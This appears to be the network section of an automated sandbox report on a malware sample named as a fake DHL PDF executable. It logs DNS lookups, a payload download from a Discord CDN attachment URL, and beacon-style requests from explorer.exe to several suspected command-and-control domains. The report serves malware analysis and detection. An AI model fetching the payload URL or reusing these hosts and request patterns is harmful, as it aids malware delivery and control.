Sep 27, 2021 20:36:57.019843102 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.019853115 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.019880056 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.031507969 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.031554937 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.031595945 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.031609058 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.031622887 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.031663895 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.031692028 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.031723976 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.031739950 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.031752110 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.031796932 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.031805992 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.031861067 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.031913042 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.031923056 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.032469988 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.032531023 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.032548904 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.032563925 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.032613993 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.032624960 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.033905983 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.034017086 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.034034967 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.034588099 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.034629107 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.034694910 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.034708977 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.034883022 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.038305044 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.049222946 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.067157984 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.068726063 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.068748951 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.068763018 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.068820953 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.068849087 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.069235086 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.069259882 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.069274902 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.069308996 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.069320917 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.069341898 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.069350958 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.069376945 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.069386005 CEST	443	49739	162.159.133.233	192.168.2.3
Sep 27, 2021 20:36:57.069473982 CEST	49739	443	192.168.2.3	162.159.133.233
Sep 27, 2021 20:36:57.069494963 CEST	443	49739	162.159.133.233	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 20:36:56.424174070 CEST	57459	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:36:56.443192959 CEST	53	57459	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:15.305825949 CEST	57875	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:15.335608959 CEST	53	57875	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:24.190201998 CEST	54154	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:24.203867912 CEST	53	54154	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:40.245599985 CEST	52806	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:40.263565063 CEST	53	52806	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:42.992741108 CEST	53910	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:43.008935928 CEST	53	53910	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:43.749377966 CEST	64021	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:43.766030073 CEST	53	64021	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:44.807373047 CEST	60784	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:44.820276976 CEST	53	60784	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:45.345087051 CEST	51143	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:45.357924938 CEST	53	51143	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:45.765352964 CEST	56009	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:45.778198004 CEST	53	56009	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:46.276500940 CEST	59026	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:46.289974928 CEST	53	59026	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:46.411261082 CEST	49572	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:46.425513983 CEST	53	49572	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:47.238435984 CEST	60823	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:47.252623081 CEST	53	60823	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:47.767625093 CEST	52130	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:47.779938936 CEST	53	52130	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:50.224714994 CEST	55102	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:50.237395048 CEST	53	55102	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:50.962335110 CEST	56236	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:50.975714922 CEST	53	56236	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:51.330590010 CEST	56527	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:51.343575954 CEST	53	56527	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:56.344814062 CEST	49559	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:56.358184099 CEST	53	49559	8.8.8.8	192.168.2.3
Sep 27, 2021 20:37:58.005261898 CEST	52650	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:37:58.038218975 CEST	53	52650	8.8.8.8	192.168.2.3
Sep 27, 2021 20:38:12.834623098 CEST	63297	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:38:12.847929955 CEST	53	63297	8.8.8.8	192.168.2.3
Sep 27, 2021 20:38:19.623287916 CEST	58361	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:38:19.679585934 CEST	53	58361	8.8.8.8	192.168.2.3
Sep 27, 2021 20:38:24.803181887 CEST	53615	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:38:25.829257965 CEST	53615	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:38:26.829406023 CEST	53615	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:38:27.968054056 CEST	53	53615	8.8.8.8	192.168.2.3
Sep 27, 2021 20:38:29.236413002 CEST	53	53615	8.8.8.8	192.168.2.3
Sep 27, 2021 20:38:29.971919060 CEST	53	53615	8.8.8.8	192.168.2.3
Sep 27, 2021 20:38:30.882874012 CEST	50728	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:38:30.912561893 CEST	53	50728	8.8.8.8	192.168.2.3
Sep 27, 2021 20:38:32.308603048 CEST	53777	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:38:32.322289944 CEST	53	53777	8.8.8.8	192.168.2.3
Sep 27, 2021 20:38:32.975637913 CEST	57106	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:38:33.318994045 CEST	53	57106	8.8.8.8	192.168.2.3
Sep 27, 2021 20:38:38.362535954 CEST	60352	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:38:38.403629065 CEST	53	60352	8.8.8.8	192.168.2.3
Sep 27, 2021 20:38:43.460763931 CEST	56773	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:38:43.499557972 CEST	53	56773	8.8.8.8	192.168.2.3
Sep 27, 2021 20:38:44.814166069 CEST	60982	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:38:44.849046946 CEST	53	60982	8.8.8.8	192.168.2.3
Sep 27, 2021 20:38:48.737744093 CEST	58058	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:38:48.772588968 CEST	53	58058	8.8.8.8	192.168.2.3
Sep 27, 2021 20:38:53.875994921 CEST	64367	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:38:53.930269003 CEST	53	64367	8.8.8.8	192.168.2.3
Sep 27, 2021 20:38:54.285551071 CEST	51539	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:38:54.299525976 CEST	53	51539	8.8.8.8	192.168.2.3
Sep 27, 2021 20:39:03.983308077 CEST	55393	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:39:04.031445026 CEST	53	55393	8.8.8.8	192.168.2.3
Sep 27, 2021 20:39:09.110415936 CEST	50585	53	192.168.2.3	8.8.8.8
Sep 27, 2021 20:39:09.156925917 CEST	53	50585	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Sep 27, 2021 20:38:29.236493111 CEST	192.168.2.3	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Sep 27, 2021 20:38:29.972481966 CEST	192.168.2.3	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 27, 2021 20:36:56.424174070 CEST	192.168.2.3	8.8.8.8	0x28f6	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:19.623287916 CEST	192.168.2.3	8.8.8.8	0x86f	Standard query (0)	www.laliinparfumeri.com	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:24.803181887 CEST	192.168.2.3	8.8.8.8	0x95f8	Standard query (0)	www.qq8.space	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:25.829257965 CEST	192.168.2.3	8.8.8.8	0x95f8	Standard query (0)	www.qq8.space	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:26.829406023 CEST	192.168.2.3	8.8.8.8	0x95f8	Standard query (0)	www.qq8.space	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:32.975637913 CEST	192.168.2.3	8.8.8.8	0x6bb5	Standard query (0)	www.bjhaitaoshop.com	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:38.362535954 CEST	192.168.2.3	8.8.8.8	0x811e	Standard query (0)	www.lighterthanlight.net	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:43.460763931 CEST	192.168.2.3	8.8.8.8	0xc2bb	Standard query (0)	www.dependablelawnsnow.com	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:48.737744093 CEST	192.168.2.3	8.8.8.8	0x44f4	Standard query (0)	www.anushreehomemadeproducts.online	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:53.875994921 CEST	192.168.2.3	8.8.8.8	0x96bf	Standard query (0)	www.thera.xyz	A (IP address)	IN (0x0001)
Sep 27, 2021 20:39:03.983308077 CEST	192.168.2.3	8.8.8.8	0x7f26	Standard query (0)	www.themshirt.com	A (IP address)	IN (0x0001)
Sep 27, 2021 20:39:09.110415936 CEST	192.168.2.3	8.8.8.8	0xa81a	Standard query (0)	www.aquitemtijolo.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 27, 2021 20:36:56.443192959 CEST	8.8.8.8	192.168.2.3	0x28f6	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Sep 27, 2021 20:36:56.443192959 CEST	8.8.8.8	192.168.2.3	0x28f6	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Sep 27, 2021 20:36:56.443192959 CEST	8.8.8.8	192.168.2.3	0x28f6	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Sep 27, 2021 20:36:56.443192959 CEST	8.8.8.8	192.168.2.3	0x28f6	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Sep 27, 2021 20:36:56.443192959 CEST	8.8.8.8	192.168.2.3	0x28f6	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:19.679585934 CEST	8.8.8.8	192.168.2.3	0x86f	No error (0)	www.laliinparfumeri.com	laliinparfumeri.com		CNAME (Canonical name)	IN (0x0001)
Sep 27, 2021 20:38:19.679585934 CEST	8.8.8.8	192.168.2.3	0x86f	No error (0)	laliinparfumeri.com		185.15.197.14	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:27.968054056 CEST	8.8.8.8	192.168.2.3	0x95f8	Server failure (2)	www.qq8.space	none	none	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:29.236413002 CEST	8.8.8.8	192.168.2.3	0x95f8	Server failure (2)	www.qq8.space	none	none	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:29.971919060 CEST	8.8.8.8	192.168.2.3	0x95f8	Server failure (2)	www.qq8.space	none	none	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:33.318994045 CEST	8.8.8.8	192.168.2.3	0x6bb5	Name error (3)	www.bjhaitaoshop.com	none	none	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:38.403629065 CEST	8.8.8.8	192.168.2.3	0x811e	No error (0)	www.lighterthanlight.net		178.254.0.81	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:43.499557972 CEST	8.8.8.8	192.168.2.3	0xc2bb	No error (0)	www.dependablelawnsnow.com	dependablelawnsnow.com		CNAME (Canonical name)	IN (0x0001)
Sep 27, 2021 20:38:43.499557972 CEST	8.8.8.8	192.168.2.3	0xc2bb	No error (0)	dependablelawnsnow.com		34.102.136.180	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:48.772588968 CEST	8.8.8.8	192.168.2.3	0x44f4	No error (0)	www.anushreehomemadeproducts.online		104.21.5.62	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:48.772588968 CEST	8.8.8.8	192.168.2.3	0x44f4	No error (0)	www.anushreehomemadeproducts.online		172.67.133.9	A (IP address)	IN (0x0001)
Sep 27, 2021 20:38:53.930269003 CEST	8.8.8.8	192.168.2.3	0x96bf	No error (0)	www.thera.xyz		52.58.78.16	A (IP address)	IN (0x0001)
Sep 27, 2021 20:39:04.031445026 CEST	8.8.8.8	192.168.2.3	0x7f26	No error (0)	www.themshirt.com	themshirt.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Sep 27, 2021 20:39:04.031445026 CEST	8.8.8.8	192.168.2.3	0x7f26	No error (0)	themshirt.myshopify.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Sep 27, 2021 20:39:04.031445026 CEST	8.8.8.8	192.168.2.3	0x7f26	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)
Sep 27, 2021 20:39:09.156925917 CEST	8.8.8.8	192.168.2.3	0xa81a	Name error (3)	www.aquitemtijolo.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

cdn.discordapp.com

www.laliinparfumeri.com

www.lighterthanlight.net

www.dependablelawnsnow.com

www.anushreehomemadeproducts.online

www.thera.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49739	162.159.133.233	443	C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49740	162.159.133.233	443	C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49837	185.15.197.14	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 20:38:19.739379883 CEST	5746	OUT	GET /o4um/?gBZ81XL=0ZTSB4q90pXvWn2TqwOUMvEVaTKS+JdNyJaEOeyzrKzgv7hy4stdYvgCEQe0HBbX8SxQ&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1 Host: www.laliinparfumeri.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2021 20:38:19.793910980 CEST	5746	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 27 Sep 2021 19:26:36 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.laliinparfumeri.com/o4um/?gBZ81XL=0ZTSB4q90pXvWn2TqwOUMvEVaTKS+JdNyJaEOeyzrKzgv7hy4stdYvgCEQe0HBbX8SxQ&0h-hGP=6lrHbNH0tTUDvPa Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49841	178.254.0.81	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 20:38:38.427388906 CEST	5772	OUT	GET /o4um/?gBZ81XL=NmWArNFcCM0eoZWDJYXkCpdPU4u48b3a02rAkKDw3xtvPLdWME8dWY2ZX0sn8dIRZYch&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1 Host: www.lighterthanlight.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2021 20:38:38.450105906 CEST	5772	IN	HTTP/1.1 404 Not Found Date: Mon, 27 Sep 2021 18:38:38 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49842	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 20:38:43.515732050 CEST	5774	OUT	GET /o4um/?gBZ81XL=uOkBJSjIW3F6CP8rQxyvI2MBRBl8nhg0UoToBCoVSjs9ZXrMBkf12YfZAaFMMZR1Rm2X&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1 Host: www.dependablelawnsnow.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2021 20:38:43.696515083 CEST	5775	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 27 Sep 2021 18:38:43 GMT Content-Type: text/html Content-Length: 275 ETag: "6151bfae-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49861	104.21.5.62	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 20:38:48.799482107 CEST	5821	OUT	GET /o4um/?gBZ81XL=my1uKSCvdi1Dfs79c5aF+OWPglwEaruDjgZM5a49fOsGBH+Y4QWrHEYhu2ZyQtf7Uf64&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1 Host: www.anushreehomemadeproducts.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2021 20:38:48.832298994 CEST	5823	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 27 Sep 2021 18:38:48 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Mon, 27 Sep 2021 19:38:48 GMT Location: https://www.anushreehomemadeproducts.online/o4um/?gBZ81XL=my1uKSCvdi1Dfs79c5aF+OWPglwEaruDjgZM5a49fOsGBH+Y4QWrHEYhu2ZyQtf7Uf64&0h-hGP=6lrHbNH0tTUDvPa Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F9dAUZlaJlVEkkBQ3Ae0WwZEG%2FYX%2F6eQhtgvbiR%2Bx%2FPGpmHJYmBrYJ8kqR8m52T47mqF%2FDRb8n0pajkL43ivrGPrOmFRspSqnnfbiiHjbInpEcG%2BC%2BRBEACeQU0XPKo50%2B2RSzhDk7TVANfp3uNtkqFsySKAFQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6956d9e30c374aa4-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49865	52.58.78.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 20:38:53.955553055 CEST	5830	OUT	GET /o4um/?gBZ81XL=sLOz5fxzAB+rAW0hlPtJlSBTLXwWl5RPAfNZDklBst6583qURvc+7YZqdqws0gKI3hH9&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1 Host: www.thera.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2021 20:38:53.973635912 CEST	5830	IN	HTTP/1.1 410 Gone Server: openresty Date: Mon, 27 Sep 2021 18:38:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 39 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 72 61 2e 78 79 7a 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 35 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 72 61 2e 78 79 7a 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>49 <meta http-equiv='refresh' content='5; url=http://www.thera.xyz/' />a </head>9 <body>35 You are being redirected to http://www.thera.xyza </body>8</html>0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49739	162.159.133.233	443	C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-27 18:36:56 UTC	0	OUT	GET /attachments/890478905998331907/891784228721807420/bin.pdf HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2021-09-27 18:36:57 UTC	0	IN	HTTP/1.1 200 OK Date: Mon, 27 Sep 2021 18:36:57 GMT Content-Type: application/pdf Content-Length: 167424 Connection: close CF-Ray: 6956d7282eae5a25-MXP Accept-Ranges: bytes Age: 3593 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=bin.pdf ETag: "37e9ef7b50fd39735d9fbcb16da55cba" Expires: Tue, 27 Sep 2022 18:36:57 GMT Last-Modified: Sun, 26 Sep 2021 20:32:08 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1632688328882090 x-goog-hash: crc32c=fEkWnA== x-goog-hash: md5=N+nve1D9OXNdn7yxbaVcug== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 167424 X-GUploader-UploadID: ADPycdsIppADOuLImTpDbISxveaxTaCa-NtoD6SZFT7ocO9U582XFiIUZOmPVWKpMAs4bqxa850_EeTyVI9GMClWVgh0er5a0w X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
